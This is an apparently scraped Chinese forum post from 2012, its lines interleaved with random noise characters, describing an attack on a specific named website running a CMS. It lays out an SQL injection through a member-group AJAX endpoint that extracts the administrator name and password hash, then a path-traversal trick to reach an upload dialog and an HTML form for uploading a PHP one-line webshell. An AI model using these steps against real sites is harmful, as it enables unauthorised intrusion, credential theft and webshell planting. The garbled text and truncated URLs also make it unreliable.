①注入漏洞。
: f& F# x @& f" j/ G这站 http://www.political-security.com/4 ~7 E- g5 m2 m/ r- m
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
& z! p0 C. r" o! y& Wwww.political-security.com/data/mysql_error_trace.inc 爆后台) O+ `7 C6 b4 _/ B# ?
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。( f0 W) | z; q6 @" h" Y4 P
然后写上语句
/ \4 u# L5 \$ S2 ?, T5 z2 Q查看管理员帐号, r7 w( `7 A) I& P( m6 B4 \0 }
http://www.political-security.co ... &membergroup=@`
* ^0 c% @, z* L
: ]* \; ^) V. H8 b0 madmin - L+ Y6 x- B4 A+ b$ h
1 {$ E1 }2 [* ^- A0 N" \查看管理员密码
7 X4 u& \2 s. j7 [ h! E w5 v" Y http://www.political-security.co ... &membergroup=@`# Y: i- ]. ?% A# d' v( E) P
* \7 q! k8 w. z$ L8 j$ E5 G8d29b1ef9f8c5a5af429
% C% M* f' w& |
3 o: B/ }8 r5 V+ N3 P4 R查看管理员密码
9 L$ O' ]5 u/ a) R$ \0 p y$ y0 M- G# L1 Y! T- q- c+ H. n; B( D0 j
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
5 l. I W( ?& Q+ P3 u: r* Z, ~) i: K8 p+ r- D9 H2 `
8d2
0 G1 S5 i q" g) ^/ t0 n9b1ef9f8c5a5af42
& j- g& V/ p" \9
6 S ` p/ c% ?2 \4 c* w; O1 O% d9 _% V; V4 O, L
cmd5没解出来 只好测试第二个方法0 Y6 h+ ?- R" Z3 \
% @. l7 h5 M, K1 ~" f" _4 n
5 g, ~ _) f7 o1 H' `! W6 L②上传漏洞:: t! L# p! m2 m6 J
9 g* N, A8 F/ ^. Y. B7 ], k* B6 |6 {' p
只要登陆会员中心,然后访问页面链接1 y" q7 A% j/ l' @
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”2 B7 O* I9 U' j
- Z5 o/ _! [. V, \
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
9 _' ? J% n p [- m. i/ r2 y9 j; D2 e- z
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm! I3 m; u5 U6 I3 y
: T; B+ T0 H& \9 F6 U
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
0 @, u- `) Z& a& j或者: k* U8 J |! @: e7 `
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对